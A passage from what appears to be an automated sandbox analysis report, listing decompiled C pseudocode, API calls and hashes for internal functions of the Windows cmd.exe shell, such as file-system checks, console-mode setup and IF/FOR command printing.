                                    								__eflags = _t183;
                                    								if(_t183 == 0) {
                                    									L106:
                                    									_t104 = 0x80070057;
                                    								} else {
                                    									__eflags = _t183 - 0x7fffffff;
                                    									if(_t183 > 0x7fffffff) {
                                    										goto L106;
                                    									}
                                    								}
                                    								__eflags = _t104;
                                    								if(_t104 < 0) {
                                    									L109:
                                    									_t172 = 0;
                                    								} else {
                                    									_t104 = 0;
                                    									_t159 = _t183;
                                    									_t173 = _t187;
                                    									__eflags = _t183;
                                    									if(_t183 == 0) {
                                    										L108:
                                    										_t104 = 0x80070057;
                                    										goto L109;
                                    									} else {
                                    										while(1) {
                                    											__eflags =  *_t173 - _t104;
                                    											if( *_t173 == _t104) {
                                    												break;
                                    											}
                                    											_t173 = _t173 + 2;
                                    											_t159 = _t159 - 1;
                                    											__eflags = _t159;
                                    											if(_t159 != 0) {
                                    												continue;
                                    											} else {
                                    												goto L108;
                                    											}
                                    											goto L114;
                                    										}
                                    										__eflags = _t159;
                                    										if(_t159 == 0) {
                                    											goto L108;
                                    										} else {
                                    											_t172 = _t183 - _t159;
                                    											__eflags = _t172;
                                    										}
                                    									}
                                    								}
                                    								__eflags = _t104;
                                    								if(_t104 >= 0) {
                                    									_t113 = _v8 + _t172 * 2;
                                    									_t190 = _t183 - _t172;
                                    									__eflags = _t190;
                                    									if(_t190 == 0) {
                                    										L83:
                                    										_t113 = _t113 - 2;
                                    									} else {
                                    										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
                                    										_t183 = 0x120faa0 - _t113;
                                    										__eflags = 0x120faa0;
                                    										while(1) {
                                    											__eflags = _t177;
                                    											if(_t177 == 0) {
                                    												break;
                                    											}
                                    											_t158 =  *(_t113 + _t183) & 0x0000ffff;
                                    											__eflags = _t158;
                                    											if(_t158 == 0) {
                                    												break;
                                    											} else {
                                    												 *_t113 = _t158;
                                    												_t177 = _t177 - 1;
                                    												_t113 =  &(_t113[0]);
                                    												_t190 = _t190 - 1;
                                    												__eflags = _t190;
                                    												if(_t190 != 0) {
                                    													continue;
                                    												} else {
                                    													goto L83;
                                    												}
                                    											}
                                    											goto L85;
                                    										}
                                    										__eflags = _t190;
                                    										if(_t190 == 0) {
                                    											goto L83;
                                    										}
                                    									}
                                    									L85:
                                    									_t187 = _v8;
                                    									__eflags = 0;
                                    									 *_t113 = 0;
                                    								}
                                    								_t136[0xf] = _t187;
                                    								while(1) {
                                    									L62:
                                    									_t105 = E011DEEC8();
                                    									__eflags = _t105;
                                    									if(_t105 == 0) {
                                    										break;
                                    									}
                                    									_t108 = E011DF030(1);
                                    									__eflags = _t108 - 0x4000;
                                    									if(_t108 == 0x4000) {
                                    										_t145 = _t136[0xf];
                                    										_t180 =  *0x120fa8c;
                                    										__eflags = _t145;
                                    										if(_t145 != 0) {
                                    											goto L102;
                                    										}
                                    										goto L68;
                                    									} else {
                                    										_t188 = _v12;
                                    										_t109 = E011E02B0(_t136, _t188, _t183, _t188);
                                    										__eflags = _t109;
                                    										if(_t109 != 0) {
                                    											_t110 =  *_t188;
                                    											do {
                                    												_t69 = _t110 + 0x14; // 0x14
                                    												_t137 = _t69;
                                    												_t110 =  *_t137;
                                    												_v12 = _t137;
                                    												__eflags = _t110;
                                    											} while (_t110 != 0);
                                    											_t136 = _v20;
                                    											continue;
                                    										} else {
                                    											__eflags = 0;
                                    											E011DF300(_t109, 0, 0, _t109);
                                    										}
                                    									}
                                    									break;
                                    								}
                                    								_t136[0xd] = _v16;
                                    								return _t136;
                                    							} else {
                                    								L23:
                                    								return E011E6FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
                                    							}
                                    						}
                                    					}
                                    				}
                                    				goto L114;
                                    			}


                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspacelongjmp
                                    • String ID: =,;
                                    • API String ID: 4008636219-1539845467
                                    • Opcode ID: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction ID: 43664dc3122cc4c10c3e97e971d26d6a92d415cc76c40dbf87aaba725fab154d
                                    • Opcode Fuzzy Hash: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction Fuzzy Hash: A4D12775A01612CBDF3C9F6CD8487BE7BE5EF4020AF14446EE9469F281EB749980CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 42%
                                    			E011FB9D3(void* __ecx, char __edx, char _a4) {
                                    				signed int _v8;
                                    				long _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				int _v556;
                                    				char _v560;
                                    				int _v564;
                                    				void _v1084;
                                    				char _v1085;
                                    				long _v1092;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t41;
                                    				void* _t63;
                                    				WCHAR* _t64;
                                    				int _t65;
                                    				WCHAR* _t66;
                                    				void* _t69;
                                    				void* _t70;
                                    				void* _t71;
                                    				WCHAR* _t73;
                                    				WCHAR* _t81;
                                    				void* _t89;
                                    				WCHAR* _t90;
                                    				signed int _t91;
                                    
                                    				_t88 = __edx;
                                    				_t41 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t41 ^ _t91;
                                    				_v1085 = __edx;
                                    				_t90 = 0;
                                    				_v20 = 0x104;
                                    				_v28 = 0;
                                    				_t73 = 1;
                                    				_t89 = __ecx;
                                    				_v24 = 1;
                                    				memset( &_v548, 0, 0x104);
                                    				_v564 = 0;
                                    				_v560 = 1;
                                    				_v556 = 0x104;
                                    				memset( &_v1084, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L27:
                                    					_t90 = _t73;
                                    					goto L28;
                                    				} else {
                                    					_t63 = _v564;
                                    					if(_t63 == 0) {
                                    						_t63 =  &_v1084;
                                    					}
                                    					__imp__GetVolumePathNameW(_t89, _t63, _v556);
                                    					if(_t63 == 0) {
                                    						goto L27;
                                    					} else {
                                    						_t64 = _v564;
                                    						if(_t64 == 0) {
                                    							_t64 =  &_v1084;
                                    						}
                                    						_t65 = GetDriveTypeW(_t64);
                                    						if(_t65 == 0 || _t65 == 4) {
                                    							_t73 = _t90;
                                    							goto L27;
                                    						} else {
                                    							_t66 = _v28;
                                    							if(_t66 == 0) {
                                    								_t66 =  &_v548;
                                    							}
                                    							_t81 = _v564;
                                    							if(_t81 == 0) {
                                    								_t81 =  &_v1084;
                                    							}
                                    							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
                                    								goto L27;
                                    							} else {
                                    								_t69 = _v28;
                                    								if(_t69 == 0) {
                                    									_t69 =  &_v548;
                                    								}
                                    								__imp___wcsicmp(_t69, L"NTFS");
                                    								if(_t69 != 0) {
                                    									if(_a4 == 0) {
                                    										L21:
                                    										if(_v1085 == 0) {
                                    											L28:
                                    											_t73 = _t90;
                                    										} else {
                                    											_t70 = _v28;
                                    											if(_t70 == 0) {
                                    												_t70 =  &_v548;
                                    											}
                                    											__imp___wcsicmp(_t70, L"CSVFS");
                                    											if(_t70 != 0) {
                                    												goto L28;
                                    											} else {
                                    											}
                                    										}
                                    									} else {
                                    										_t71 = _v28;
                                    										if(_t71 == 0) {
                                    											_t71 =  &_v548;
                                    										}
                                    										__imp___wcsicmp(_t71, L"REFS");
                                    										if(_t71 != 0) {
                                    											goto L21;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				__imp__??_V@YAXPAX@Z(_v564);
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
                                    			}































                                    APIs
                                    • memset.MSVCRT ref: 011FBA0F
                                    • memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    • _wcsicmp.MSVCRT ref: 011FBB28
                                    • _wcsicmp.MSVCRT ref: 011FBB4D
                                    • _wcsicmp.MSVCRT ref: 011FBB75
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB8F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                    • String ID: CSVFS$NTFS$REFS
                                    • API String ID: 3510147486-2605508654
                                    • Opcode ID: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction ID: 3db9261824c524a6b4d51de2342579f8ebcffa884e9a100c7a087b82e7a779f9
                                    • Opcode Fuzzy Hash: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction Fuzzy Hash: A1515971A0421D9FEF39CAA5DC88BEBBBB8EF14254F4400ADE605D3145DB74DA84CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                    • API String ID: 2081463915-3124875276
                                    • Opcode ID: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction ID: 1c8a1eec7a84777907af1baae7f2797f17b6388be35321655d3d405e1e917a4b
                                    • Opcode Fuzzy Hash: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction Fuzzy Hash: 3A4128313007069AEB3DAF39F869B6A7BA5EB5462CF54012FE213865C1EF72D181C711
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 21%
                                    			E011E06C0(void* __ecx) {
                                    				signed int _v8;
                                    				void* __esi;
                                    				signed int _t4;
                                    				void* _t5;
                                    				void* _t6;
                                    				void* _t7;
                                    				void* _t15;
                                    				void* _t16;
                                    				signed int _t20;
                                    				signed int _t23;
                                    				signed int _t24;
                                    				signed int _t25;
                                    				void* _t26;
                                    				void* _t27;
                                    				intOrPtr* _t28;
                                    				signed int _t29;
                                    				void* _t30;
                                    				void* _t32;
                                    
                                    				_t4 =  *0x11fd0b4; // 0x2833377e
                                    				_t5 = _t4 ^ _t29;
                                    				_v8 = _t5;
                                    				__imp___get_osfhandle( *0x1203880, __ecx);
                                    				_t6 = SetConsoleMode(_t5, 1);
                                    				__imp___get_osfhandle(0x1203880);
                                    				_t32 = _t30 + 8;
                                    				_t7 = GetConsoleMode(_t6, 1);
                                    				if(_t7 == 0) {
                                    					L2:
                                    					__imp___get_osfhandle(0x1203884);
                                    					if(GetConsoleMode(_t7, 0) != 0) {
                                    						_t20 =  *0x1203884;
                                    						_t8 = _t20 & 0x00000017;
                                    						if(_t8 != 7) {
                                    							_t23 = _t20 & 0xffffffef | 0x00000007;
                                    							 *0x1203884 = _t23;
                                    							__imp___get_osfhandle(_t23);
                                    							_t8 = SetConsoleMode(_t8, 0);
                                    						}
                                    						_push(_t27);
                                    						_t28 =  *0x1203888;
                                    						if(_t28 != 0) {
                                    							 *0x12194b4(L"CMD.EXE");
                                    							_t8 =  *_t28();
                                    						}
                                    						_pop(_t27);
                                    					}
                                    					return E011E6FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
                                    				}
                                    				_t24 =  *0x11fd0e0; // 0x7
                                    				_t25 =  *0x1203880;
                                    				_t7 = _t24 & _t25;
                                    				if(_t7 != _t24) {
                                    					_t25 = _t25 | _t24;
                                    					 *0x1203880 = _t25;
                                    					__imp___get_osfhandle(_t25);
                                    					_t32 = _t32 + 4;
                                    					_t7 = SetConsoleMode(_t7, 1);
                                    					if(_t7 != 0) {
                                    						goto L2;
                                    					}
                                    					_t7 =  *0x11fd0e0; // 0x7
                                    					if((_t7 & 0x00000004) != 0) {
                                    						 *0x11fd0e0 = _t7 & 0xfffffffb;
                                    						_t15 =  *0x1203880 & 0xfffffffb;
                                    						 *0x1203880 = _t15;
                                    						__imp___get_osfhandle(_t15);
                                    						_t32 = _t32 + 4;
                                    						_t7 = SetConsoleMode(_t15, 1);
                                    					}
                                    				}
                                    				goto L2;
                                    			}






















                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E06D8
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                    • _get_osfhandle.MSVCRT ref: 011E06EF
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                    • _get_osfhandle.MSVCRT ref: 011E071E
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                    • _get_osfhandle.MSVCRT ref: 011E0750
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                    • _get_osfhandle.MSVCRT ref: 011E0794
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E079E
                                    • _get_osfhandle.MSVCRT ref: 011ECC28
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011ECC32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID: CMD.EXE
                                    • API String ID: 1606018815-3025314500
                                    • Opcode ID: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                    • Instruction ID: b2df2b0f06f3245a785a2f867bdb3917657bd21561ff69f95b3df2b282e24d7a
                                    • Opcode Fuzzy Hash: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                    • Instruction Fuzzy Hash: 8031B1B0B40A04AFDF38DBA8FC1EB253AE4BB14719B08062DF512C2185DBB0D984CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E011D9835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
                                    				signed int _v8;
                                    				void* __ebx;
                                    				void* __ebp;
                                    				intOrPtr _t76;
                                    				intOrPtr _t87;
                                    				intOrPtr _t90;
                                    				signed int _t91;
                                    				signed char _t103;
                                    				signed int _t107;
                                    				intOrPtr _t108;
                                    				signed int _t125;
                                    				signed int _t144;
                                    				intOrPtr* _t179;
                                    				void* _t182;
                                    
                                    				_t153 = __edx;
                                    				_t123 = __ecx;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t179 = __ecx;
                                    				_t114 = 0;
                                    				_t182 = __edx;
                                    				_v8 = 0;
                                    				_t76 =  *__ecx;
                                    				if(_t76 > 0x37) {
                                    					__eflags = _t76 - 0x38;
                                    					if(__eflags == 0) {
                                    						E011D9899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
                                    						L78:
                                    						_t125 =  *(_t179 + 0x3c);
                                    						L79:
                                    						E011D9835(_t125, _t182, _a4);
                                    						L7:
                                    						return 0;
                                    					}
                                    					if(__eflags <= 0) {
                                    						L54:
                                    						__imp__longjmp(0x120b8f8, 0xffffffff);
                                    						L55:
                                    						E011D9899(_t114, _a4, "(", _t114);
                                    						_v8 = ")";
                                    						L60:
                                    						E011D9835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
                                    						E011D9899(_t114, _a4, _v8, _t114);
                                    						__eflags =  *_t179 - 0x33;
                                    						if( *_t179 == 0x33) {
                                    							goto L7;
                                    						}
                                    						__eflags =  *_t179 - 0x3b;
                                    						if( *_t179 == 0x3b) {
                                    							goto L7;
                                    						}
                                    						goto L78;
                                    					}
                                    					__eflags = _t76 - 0x3a;
                                    					if(_t76 <= 0x3a) {
                                    						_v8 = L"== ";
                                    						__eflags =  *0x1213cc9;
                                    						if( *0x1213cc9 != 0) {
                                    							_t87 =  *((intOrPtr*)(__ecx + 0x44));
                                    							__eflags = _t87 - 1;
                                    							if(_t87 != 1) {
                                    								__eflags = _t87 - 2;
                                    								if(_t87 != 2) {
                                    									__eflags = _t87 - 3;
                                    									if(_t87 != 3) {
                                    										__eflags = _t87 - 4;
                                    										if(_t87 != 4) {
                                    											__eflags = _t87 - 5;
                                    											if(_t87 != 5) {
                                    												__eflags = _t87 - 6;
                                    												if(_t87 == 6) {
                                    													_v8 = L"GEQ ";
                                    												}
                                    											} else {
                                    												_v8 = L"GTR ";
                                    											}
                                    										} else {
                                    											_v8 = L"LEQ ";
                                    										}
                                    									} else {
                                    										_v8 = L"LSS ";
                                    									}
                                    								} else {
                                    									_v8 = L"NEQ ";
                                    								}
                                    							} else {
                                    								_v8 = L"EQU ";
                                    							}
                                    						}
                                    						E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
                                    						_t114 = 0;
                                    						_push(0);
                                    						_push(_v8);
                                    						L4:
                                    						E011D9899(_t114, _a4);
                                    						if( *(_t179 + 0x3c) != _t114) {
                                    							E011D9899(_t114, _a4,  *(_t179 + 0x3c), _t114);
                                    						}
                                    						E011D9CA6(_t179, _t182, _a4);
                                    						goto L7;
                                    					}
                                    					__eflags = _t76 - 0x3b;
                                    					if(_t76 == 0x3b) {
                                    						L13:
                                    						E011D9CA6(_t123, _t153, _a4);
                                    						_t114 = 1;
                                    						__eflags =  *_t179 - 0x2e;
                                    						if( *_t179 < 0x2e) {
                                    							goto L60;
                                    						}
                                    						__eflags =  *_t179 - 0x2f;
                                    						if( *_t179 <= 0x2f) {
                                    							_v8 = "&";
                                    							goto L60;
                                    						}
                                    						__eflags =  *_t179 - 0x30;
                                    						if( *_t179 == 0x30) {
                                    							_v8 = L"||";
                                    							goto L60;
                                    						}
                                    						__eflags =  *_t179 - 0x31;
                                    						if( *_t179 == 0x31) {
                                    							_v8 = L"&&";
                                    							goto L60;
                                    						}
                                    						__eflags =  *_t179 - 0x32;
                                    						if( *_t179 == 0x32) {
                                    							_v8 = "|";
                                    							goto L60;
                                    						}
                                    						__eflags =  *_t179 - 0x33;
                                    						if( *_t179 == 0x33) {
                                    							goto L55;
                                    						} else {
                                    							__eflags =  *_t179 - 0x3b;
                                    							if( *_t179 == 0x3b) {
                                    								E011D9899(1, _a4, "@", 1);
                                    								_v8 = " ";
                                    							}
                                    							goto L60;
                                    						}
                                    					}
                                    					__eflags = _t76 - 0x3c;
                                    					if(_t76 != 0x3c) {
                                    						goto L54;
                                    					}
                                    					_t90 =  *0x1218510;
                                    					__eflags = _t90 - 0x2396;
                                    					if(_t90 != 0x2396) {
                                    						__eflags = _t90 - 0x2395;
                                    						if(_t90 != 0x2395) {
                                    							__eflags = _t90 - 0x2390;
                                    							if(_t90 != 0x2390) {
                                    								goto L54;
                                    							}
                                    							_t91 = L"REM /?";
                                    							L53:
                                    							E011D9899(_t114, _a4, _t91, 1);
                                    							goto L7;
                                    						}
                                    						_t91 = L"IF /?";
                                    						goto L53;
                                    					}
                                    					_t91 = L"FOR /?";
                                    					goto L53;
                                    				}
                                    				if(_t76 >= 0x34 || _t76 == 0) {
                                    					L3:
                                    					_push(1);
                                    					_push( *((intOrPtr*)(_t179 + 0x38)));
                                    					goto L4;
                                    				} else {
                                    					__eflags = _t76 - 0x2b;
                                    					if(_t76 == 0x2b) {
                                    						E011D9899(1, _a4, L"FOR", 1);
                                    						__eflags =  *0x1213cc9;
                                    						if( *0x1213cc9 == 0) {
                                    							L41:
                                    							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
                                    							E011D9899(1, _a4, "(", 1);
                                    							E011D9899(1, _a4,  *(_t179 + 0x3c), 0);
                                    							E011D9899(1, _a4, ")", 0);
                                    							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
                                    							_t125 =  *(_t179 + 0x40);
                                    							goto L79;
                                    						}
                                    						_t103 =  *(__ecx + 0x48);
                                    						__eflags = 1 & _t103;
                                    						if((1 & _t103) == 0) {
                                    							__eflags = _t103 & 0x00000002;
                                    							if((_t103 & 0x00000002) == 0) {
                                    								__eflags = _t103 & 0x00000008;
                                    								if((_t103 & 0x00000008) == 0) {
                                    									__eflags = _t103 & 0x00000004;
                                    									if((_t103 & 0x00000004) == 0) {
                                    										goto L41;
                                    									}
                                    									_push(1);
                                    									_push(L"/R");
                                    									L38:
                                    									E011D9899(1, _a4);
                                    									__eflags =  *(_t179 + 0x4c);
                                    									if( *(_t179 + 0x4c) == 0) {
                                    										goto L41;
                                    									}
                                    									_push(1);
                                    									_push( *(_t179 + 0x4c));
                                    									goto L40;
                                    								}
                                    								_push(1);
                                    								_push(L"/F");
                                    								goto L38;
                                    							}
                                    							_push(1);
                                    							_push(L"/D");
                                    							goto L40;
                                    						} else {
                                    							_push(1);
                                    							_push(L"/L");
                                    							L40:
                                    							E011D9899(1, _a4);
                                    							goto L41;
                                    						}
                                    					}
                                    					__eflags = _t76 - 0x2c;
                                    					if(_t76 == 0x2c) {
                                    						E011D9899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
                                    						_t107 =  *(__ecx + 0x3c);
                                    						_t144 = 0;
                                    						__eflags =  *_t107 - 0x38;
                                    						if( *_t107 == 0x38) {
                                    							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
                                    							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
                                    							_t107 =  *(__ecx + 0x3c);
                                    							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
                                    								_t144 = L"/I";
                                    							}
                                    						} else {
                                    							asm("sbb ecx, ecx");
                                    							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
                                    						}
                                    						__eflags = _t144;
                                    						if(_t144 != 0) {
                                    							E011D9899(1, _a4, _t144, 1);
                                    							_t107 =  *(_t179 + 0x3c);
                                    						}
                                    						E011D9835(_t107, _t182, _a4);
                                    						E011D9835( *(_t179 + 0x40), _t182, _a4);
                                    						__eflags =  *(_t179 + 0x48);
                                    						if( *(_t179 + 0x48) == 0) {
                                    							goto L7;
                                    						} else {
                                    							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
                                    							_t125 =  *(_t179 + 0x48);
                                    							goto L79;
                                    						}
                                    					}
                                    					__eflags = _t76 - 0x2d;
                                    					if(__eflags == 0) {
                                    						goto L3;
                                    					}
                                    					if(__eflags <= 0) {
                                    						goto L54;
                                    					}
                                    					__eflags = _t76 - 0x33;
                                    					if(_t76 > 0x33) {
                                    						goto L54;
                                    					}
                                    					goto L13;
                                    				}
                                    			}


















                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                    • API String ID: 0-366822981
                                    • Opcode ID: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                    • Instruction ID: 8f9ec51c66f5d6d6b25f9777ae3baf61cdc8b94a15efac45ad00c52a029cece2
                                    • Opcode Fuzzy Hash: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                    • Instruction Fuzzy Hash: ADA1E1B070020EFBDF2CDE59C98596E7B27FB88698B10811DF6069B252C7719D91CB83
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E011DC6F4(long __ecx, intOrPtr _a4, void* _a8) {
                                    				signed int _v8;
                                    				char _v40;
                                    				short _v104;
                                    				void* _v108;
                                    				long _v112;
                                    				char* _v116;
                                    				char _v120;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t22;
                                    				signed int _t26;
                                    				char* _t31;
                                    				void* _t37;
                                    				char* _t45;
                                    				intOrPtr _t48;
                                    				WCHAR* _t55;
                                    				void* _t56;
                                    				signed int _t57;
                                    				signed int _t59;
                                    				long _t60;
                                    				void* _t61;
                                    				int _t62;
                                    				signed int _t63;
                                    
                                    				_t22 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t22 ^ _t63;
                                    				_t47 = _a8;
                                    				_t60 = __ecx;
                                    				_v108 = _a8;
                                    				_t62 = 0;
                                    				_v112 = __ecx;
                                    				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0x120b980, 0x2000, 0) == 0) {
                                    					__imp___ultoa(_t60,  &_v40, 0x10);
                                    					_t26 = E011E0638(GetACP());
                                    					asm("sbb eax, eax");
                                    					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
                                    					_v120 =  &_v104;
                                    					_t31 = L"Application";
                                    					if(_t60 < 0x2328) {
                                    						_t31 = L"System";
                                    					}
                                    					_v116 = _t31;
                                    					_push( &_v120);
                                    					_push(0x2000);
                                    					_push(0x120b980);
                                    					_push(_t62);
                                    					_push(0x13d);
                                    					_push(_t62);
                                    					_push(0x3000);
                                    					goto L6;
                                    				} else {
                                    					_t55 = 0x120b980;
                                    					_t48 = 0x25;
                                    					while(1) {
                                    						_t58 = _t48;
                                    						_t37 = E011DD7D4(_t55, _t48);
                                    						_t56 = _t37;
                                    						if(_t56 == 0) {
                                    							break;
                                    						}
                                    						_t55 = _t56 + 2;
                                    						_t59 =  *_t55 & 0x0000ffff;
                                    						if(_t59 - 0x31 > 8) {
                                    							if(_t59 == _t48) {
                                    								_t55 =  &(_t55[1]);
                                    							}
                                    						} else {
                                    							_t62 = _t62 + 1;
                                    						}
                                    					}
                                    					_t47 = _v108;
                                    					if(_t62 > _a4) {
                                    						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
                                    						if(_t47 == 0) {
                                    							L8:
                                    							return E011E6FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
                                    						}
                                    						_t57 = 0;
                                    						if(_t62 == 0) {
                                    							L21:
                                    							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0x120b980, 0x2000, _t47);
                                    							RtlFreeHeap(GetProcessHeap(), 0, _t47);
                                    							L7:
                                    							_t34 = _t62;
                                    							goto L8;
                                    						}
                                    						_t61 = _v108;
                                    						_t58 = _a4;
                                    						do {
                                    							if(_t57 >= _t58) {
                                    								_t45 = " ";
                                    							} else {
                                    								 *_t61 =  *_t61 + 4;
                                    								_t45 =  *( *_t61 - 4);
                                    							}
                                    							 *(_t47 + _t57 * 4) = _t45;
                                    							_t57 = _t57 + 1;
                                    						} while (_t57 < _t62);
                                    						_t60 = _v112;
                                    						goto L21;
                                    					}
                                    					_push(_t47);
                                    					_push(0x2000);
                                    					_push(0x120b980);
                                    					_push(_t37);
                                    					_push(_t60);
                                    					_push(_t37);
                                    					_push(0x1800);
                                    					L6:
                                    					_t62 = FormatMessageW();
                                    					goto L7;
                                    				}
                                    			}




























                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,0120B980,00002000,00000000,00000000,?,00000000), ref: 011DC735
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
